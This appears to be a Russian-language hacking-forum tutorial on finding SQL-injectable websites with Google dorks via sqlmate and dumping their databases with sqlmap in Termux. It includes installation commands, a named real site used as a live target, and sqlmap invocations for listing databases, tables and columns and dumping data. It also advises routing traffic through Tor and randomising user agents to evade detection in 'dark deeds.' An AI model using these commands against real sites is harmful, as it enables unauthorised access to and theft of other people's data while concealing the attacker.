Поиск и слив БД по гугл доркам. Используем sqlmap + sqlmate +termux
Life-Hack [Жизнь-Взлом]/ХакингРассмотрим поиск уязвимых сайтов по гугл доркам с помощью sqlmate и раскрутку в следствии и дамп базы данных с помощью sqlmap на примере.
Тот пример, который я приведу, скорее из тех сайтов, что сливались до меня овер 100500 раз. Так что не замазывая адресс хоста, я ничего собстно еще хужего не сделаю. Поехали.
Инсталим инструменты
Ставим необходимые пакеты.
Пишем:
pkg install git python python-dev python2 python2-dev
Ставим sqlmap.
pip2 install sqlmap
Проверим. Для запуска пишем
sqlmap
Вот так выглядит sqlmap

Ставим sqlmate
Копируем используя git
git clone https://github.com/s0md3v/sqlmate
Дальше идем в папку и ставим зависимости:
cd sqlmate pip2 install -r requirements.txt
Проверяем, для запуска пишем:
python2 sqlmate
Вот так выглядит sqlmate ☺

Ставим Tor
Ты же не хочешь в гости маски-шоу как на картинке снизу?

Тогда в темных делах айпишник свой палить не следует.
Для этого ставим Тор
pkg install tor
Открываем новую вкладку в термуксе и запускаем, просто пишем
tor
Когда увидите Bootstrapped 100%:Done , это значит, что тор уже запущен и настроен, можно приступать.

Юзаем sqlmate, ищем дырявые сайты
Sqlmate ищет и сразу чекает сайты по гугл доркам(тоже рассмотрим позже) на предмет sql injection, скорее всего банальной подставкой ‘ в конце запроса. Не смотрел исходники, но обычно на этом алгоритме основаны очень многое количество такого типа паблик программ.
Заходим в папку со sqlmate и запускаем
cd cd sqlmate && python2 sqlmate

Сразу просит ввести дорку. Дорки можно найти в гугле под сайты, которые вам нужны, достаточно поискать. Небольшой список я напишу в конце статьи, остальное найдете сами, или же я начну проводить раздачи когда то☺ Планов как у Наполеона, времени лишь бы хватало)
Кстати, что такое дорки и как ими пользоваться мы подробней рассмотрим в одной из следующих статей.
В пример используем дорку index.php?id=+site:cz , указываем ее и жмем энтэр.

Сразу видим 2 уязвимые сайты, к примеру я выбрал kuchynepinos.cz.
Открываем новую вкладку в термукс, походу уже 3-ю) мне так удобней лично, в ней мы будем юзать sqlmap.
Раскручиваем уязвимый сайт со sqlmap

В новой вкладке пишем
sqlmap --random-agent -tor --dbs -u http://www.kuchynepinos.cz/index.php?id=18
Или если вы используете zsh оболочку как я, то пишем
sqlmap --random-agent -tor --dbs -u http://www.kuchynepinos.cz/index.php\?id\=18
Не знаю, почему zsh просит добавлять обратные слэши, но пишет что надо, по этому спорить не будем☺
Разбор запроса: sqlmap --random-agent -tor --dbs -u http://www.kuchynepinos.cz/index.php\?id\=18
-- random-agent - даешь команду sqlmap использовать случайные юзер-агенты при запросе. Потому что по дэфолту sqlmap использует свой, где указано что тестируется сайт с проги sqlmap проще говоря. А это довольно палевно :D
-tor - делаем все запросы через Tor
--dbs - означает показать текущие базы данных, в случае успешной атаки.
Ну и -u <адресс> - сам уязвимый url, ну, предполагаемо.
Дальше зададутся в процессе теста вопросы, там уже отвечаете Y или N по своему усмотрению.
И так, в конце мы получили вот такой результат

Судя по
available databases [2]: [*] information_schema [*] kuchynepin1
все получилось, скрипт действительно уязвимый и мы получили текущие БД.
information_schema — не имеет ничего для нас интересного, это дэфолтная бд
kuchynepin1 — а вот в эту бд мы и заглянем, что там интересного.
Далее берем эту бд и смотрим какие есть таблицы:
sqlmap --random-agent -tor -u http://www.kuchynepinos.cz/index.php\?id\=18 -D kuchynepin1 --tables

-D название БД --tables — этой командой мы берем бд и просим показать нам ее таблицы-
Как видим есть одна таблица texty , в которой скорее всего нет никуя интересного, но это чисто для общего понимания пример так сказать.
Еще команды:
-D <название БД > -T <название таблицы > --columns — смотрим колонки в нужной таблице
-D <название БД > -T <название таблицы > --C < название колонки> --dump — тут мы берем нужную колонку и делаем ее дамп, можно указывать пару колонок через запятую вида (колонка,колонка2,колонка3)
Заключение
Ну и все, собственно. Если есть вопросы — пишите в лс, отвечу, подскажу.
Надеюсь статья была полезной.